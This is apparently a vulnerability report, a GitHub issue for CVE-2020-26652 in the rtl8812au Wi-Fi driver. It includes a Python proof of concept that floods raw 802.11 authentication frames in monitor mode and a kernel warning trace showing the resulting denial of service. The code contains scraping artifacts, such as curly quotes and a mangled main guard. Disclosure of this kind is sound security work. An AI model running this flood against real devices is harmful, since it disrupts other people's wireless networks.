Headline
CVE-2020-26652: fuzzing wifi ,network will down, result is net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] · Issue #730 · aircrack-ng/rtl8812au
An issue was discovered in function nl80211_send_chandef in rtl8812au v5.6.4.2 allows attackers to cause a denial of service.
testing environment
root@kali:~# uname -r
5.6.0-kali2-amd64
poc:
`
#!/usr/bin/env python
#coding=utf-8
import time
import socket
AP_MAC = “00:22:66:88:22:00”
STA_MAC = “00:13:ef:f1:04:ef”
ETH_P_ALL = 3
IFACE = “wlan0”
def mac2str(mac):
return "".join(map(lambda x: chr(int(x, 16)), mac.split(“:”)))
RADIO = “\x00”
RADIO += “\x00”
RADIO += “\x24\x00”
RADIO += “\x2f\x40\x00\xa0”
RADIO += “\x20\x08\x00\x00”
RADIO += “\x00\x00\x00\x00”
RADIO += “\x27”
RADIO += “\x43”
RADIO += “\x6e\x25”
RADIO += “\xa0\x00”
RADIO += “\x00\x00”
RADIO += “\x10\x02”
RADIO += “\x6c\x09”
RADIO += “\xa0\x00”
RADIO += “\xd0\x00”
RADIO += “\x00”
RADIO += “\x00”
RADIO += “\xd0”
RADIO += “\x00”
AUTH_REQ_OPEN = RADIO + “\xB0” # Type/Subtype
AUTH_REQ_OPEN += “\x08” # Flags
AUTH_REQ_OPEN += “\xc3\x50” # Duration ID
AUTH_REQ_OPEN += mac2str(AP_MAC) # Desti8nation address
AUTH_REQ_OPEN += mac2str(STA_MAC) # Source address
AUTH_REQ_OPEN += mac2str(AP_MAC) # BSSID
AUTH_REQ_OPEN += “\x00\x00” # Sequence control
AUTH_REQ_OPEN += “\x00\x00” # Authentication algorithm (open)
AUTH_REQ_OPEN += “\x01\x00” # Authentication sequence number
AUTH_REQ_OPEN += “\x00\x00” # Authentication status
AUTH_REQ_OPEN += “\x1f\xd8” # Authentication status
AUTH_REQ_OPEN += “\x5a\x07” # Authentication status
AUTH_REQ_HDR = AUTH_REQ_OPEN[:-6]
def start_fuzz():
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
s.bind((IFACE, ETH_P_ALL))
while True:
print("send msg:",AUTH_REQ_OPEN)
s.send(AUTH_REQ_OPEN)
def main():
start_fuzz()
if name == "main":
main()
`
when execute poc, we should turn on monitoring mode:
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
result
[ 952.607304] WARNING: CPU: 0 PID: 1293 at net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] [ 952.607304] Modules linked in: nfnetlink_queue(E) nfnetlink_log(E) 88XXau(OE) nfnetlink(E) bluetooth(E) drbg(E) ansi_cprng(E) ecdh_generic(E) ecc(E) cfg80211(E) rfkill(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vmw_vsock_vmci_transport(E) vsock(E) intel_rapl_msr(E) intel_rapl_common(E) intel_rapl_perf(E) vmw_balloon(E) joydev(E) serio_raw(E) pcspkr(E) sg(E) vmw_vmci(E) evdev(E) ac(E) binfmt_misc(E) fuse(E) sunrpc(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) crc32c_generic(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) crc32_pclmul(E) crc32c_intel(E) ghash_clmulni_intel(E) hid_generic(E) usbhid(E) hid(E) sr_mod(E) cdrom(E) ata_generic(E) vmwgfx(E) aesni_intel(E) libaes(E) crypto_simd(E) cryptd(E) glue_helper(E) ttm(E) psmouse(E) drm_kms_helper(E) ata_piix(E) cec(E) uhci_hcd(E) ehci_pci(E) xhci_pci(E) xhci_hcd(E) e1000(E) ehci_hcd(E) usbcore(E) usb_common(E) mptspi(E) mptscsih(E) mptbase(E) [ 952.607325] scsi_transport_spi(E) drm(E) libata(E) i2c_piix4(E) scsi_mod(E) button(E) [ 952.607329] CPU: 0 PID: 1293 Comm: RTW_CMD_THREAD Tainted: G OE 5.6.0-kali2-amd64 #1 Debian 5.6.14-1kali1 [ 952.607330] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/29/2019 [ 952.607340] RIP: 0010:nl80211_send_chandef+0x14b/0x160 [cfg80211] [ 952.607341] Code: 00 00 be a1 00 00 00 48 89 ef 89 44 24 04 e8 7c 8a 07 d6 85 c0 0f 84 7b ff ff ff 41 bc 97 ff ff ff e9 70 ff ff ff 31 c0 eb a7 <0f> 0b 41 bc ea ff ff ff e9 5f ff ff ff e8 c3 c7 cb d5 0f 1f 00 0f [ 952.607342] RSP: 0018:ffffa687c088fd80 EFLAGS: 00010246 [ 952.607343] RAX: 0000000000000000 RBX: ffffa687c088fe08 RCX: 0000000000000087 [ 952.607343] RDX: 00000000c07597ec RSI: 00000000ffff259c RDI: ffffa687c088fe08 [ 952.607344] RBP: ffff98e22da4dd00 R08: 0000000000000003 R09: 0000000000000004 [ 952.607344] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa687c088fe08 [ 952.607344] R13: 0000000000000000 R14: ffff98e22da4dd00 R15: ffff98e2343a3014 [ 952.607345] FS: 0000000000000000(0000) GS:ffff98e23be00000(0000) knlGS:0000000000000000 [ 952.607346] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 952.607346] CR2: 00007f9224153030 CR3: 000000007a080005 CR4: 00000000002606f0 [ 952.607365] Call Trace: [ 952.607395] nl80211_ch_switch_notify.constprop.0+0xcd/0x170 [cfg80211] [ 952.607424] rtw_cfg80211_ch_switch_notify+0x138/0x147 [88XXau] [ 952.607440] ? rtw_chk_start_clnt_join+0x79/0x79 [88XXau] [ 952.607454] rtw_chk_start_clnt_join+0x72/0x79 [88XXau] [ 952.607468] join_cmd_hdl+0x267/0x373 [88XXau] [ 952.607476] rtw_cmd_thread+0x295/0x3ed [88XXau] [ 952.607494] kthread+0xf9/0x130 [ 952.607504] ? rtw_stop_cmd_thread+0x39/0x39 [88XXau] [ 952.607506] ? kthread_park+0x90/0x90 [ 952.607521] ret_from_fork+0x35/0x40 [ 952.607524] —[ end trace c0d1960d55eb317c ]—